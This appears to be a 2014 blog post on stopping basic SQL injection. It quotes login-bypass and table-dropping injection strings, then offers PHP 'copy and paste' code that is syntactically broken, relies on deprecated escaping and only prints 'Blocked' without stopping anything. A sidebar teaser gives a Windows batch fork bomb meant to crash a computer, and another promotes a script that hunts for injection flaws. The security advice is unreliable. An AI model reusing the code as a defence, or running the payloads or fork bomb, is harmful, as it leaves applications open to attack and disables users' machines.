Monday, January 27, 2014

How to stop basic SQL injection attacks

The basic attack is log in form bypassing which has already been discussed in a couple of previous posts. In this type of SQL injection we inject queries like 1‘OR’1‘=’1 etc. in the user name and password fields.

The code which is used in these types of websites that can be easily
Worked around through the above said queries Apart from this the user can also delete the database by executing "' drop table database; --".

The code below allows the queries



  You will have to use mysql_real_escape_string in the php code 

Here is the PHP code.



Here is the PHP code that you can copy and paste.

<?php
$badword = "' OR 1 '";
$badword = mysql_real_escape_string($badword);
$message = "SELECT * from database WHERE password = "'$badword'";
echo "Blocked " . $message . ";
?>


Hope this was useful please like subscribe and follow.

at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

how to make a batch file to crash windows

here is the "code" %0|%0 paste that in a notepad and save it as whateveryou want.bat for example lol.bat by running this it...

  • Smartd0rk3r
    Smartd0rk3r is a python script that performs dork searching and searches for local file inclusion and SQL injection errors. It is based on...
  • 100th Post
    So I have written 100 posts in under two months I think that this is a big achievment please follow and like this post so I can continue to...
  • Hacking with Kali linux ( Pdf download)
    Kali Linux although it sounds like slang for California,  Kali through the phases of the penetration testing life cycle; one major tool fr...